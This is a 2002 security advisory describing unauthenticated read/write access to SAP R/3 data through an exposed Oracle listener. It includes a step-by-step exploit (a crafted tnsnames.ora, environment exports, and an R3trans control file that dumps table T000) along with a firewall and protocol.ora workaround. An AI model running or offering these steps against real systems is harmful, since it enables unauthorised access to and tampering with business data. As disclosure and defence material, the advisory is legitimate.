26th Sep 2002 [SBWID-5317]
COMMAND
	SAP R/3 spoofing via database listener
SYSTEMS AFFECTED
	All R/3 Releases using SQL*net V2 (3.x, 4.x, 6.10)
PROBLEM
	From Jochen Hein [[email protected]] announcement :
	Every user having network access to the  oracle  listener  port  on  the
	database host may read/write/modify any SAP data.
	 Exploit :
	 =======
	Needed knowledge: IP address (and port) of the  database  host  and  the
	System ID (SID).  You  may  get  them  with  a  packet  sniffer,  social
	engineering or just running sapinfo against a running SAP  R/3.  sapinfo
	also tells you the R/3 release, which we'll  need  (we  use  R3trans  of
	that release.
	With these informations an attacker can  create  a  local  user  sidadm,
	craft a tnsnames.ora and an environment for running R3trans.
	
	  SID.world =
	  (DESCRIPTION =
	    (ADDRESS_LIST =
	        (ADDRESS =
	          (COMMUNITY = sap.world)
	          (PROTOCOL = TCP)
	          (Host = hostname)
	          (Port = 1527)
	        )
	    )
	    (CONNECT_DATA =
	       (SID = SID)
	       (GLOBAL_NAME = SID.world)
	    )
	  )
	
	And running the commands (note you need the R3trans from the target  R/3
	release):
	
	sidadm> export TNS_ADMIN=$HOME/
	sidadm> export ORACLE_HOME=/oracle/SID
	sidadm> export ORACLE_SID=SID
	sidadm> export PATH="$PATH:/oracle/SID/817_32/bin:/usr/sap/SID/SYS/exe/run"
	sidadm> export dbms_type=oraexport DIR_LIBRARY=/usr/sap/SID/SYS/exe/run
	sidadm> export dbs_ora_tnsname=SID
	sidadm> export TNS_ADMIN=/home/sidadm
	sidadm> cat control
	export
	compress=no
	client=000
	# select table where name = T000
	select * from t000
	sidadm> R3trans control
	...
	sidadm> strings trans.dat
	...
	q  000SAP AG             Walldorf               DEM [...]
	q  001Auslieferungsmandant R11 Kundstadt        EUR [...]
	...
	
	Any user on the  local  network  can  access  any  SAP  data  read/write
	without password. No SAP authority checks are applied.
	...
	 References :
	 ==========
	A complete exploit and more remarks are (in German) [2]here.
	OSS note 186119.
	
	 1. http://www.sap.com/
	 2. http://www.lan-ks.de/~jochen/sap-r3/ora-hack.html
	 3. mailto:[email protected]
	
SOLUTION
	Workaround is to restrict access to the Oracle port either with  network
	means (a firewall) or using the following protocol.ora  options  on  the
	database server:
	
	tcp.nodelay = true
	tcp.validnode_checking = yes
	tcp.invited_nodes = ( hostname, hostname )
	
	There is no patch available.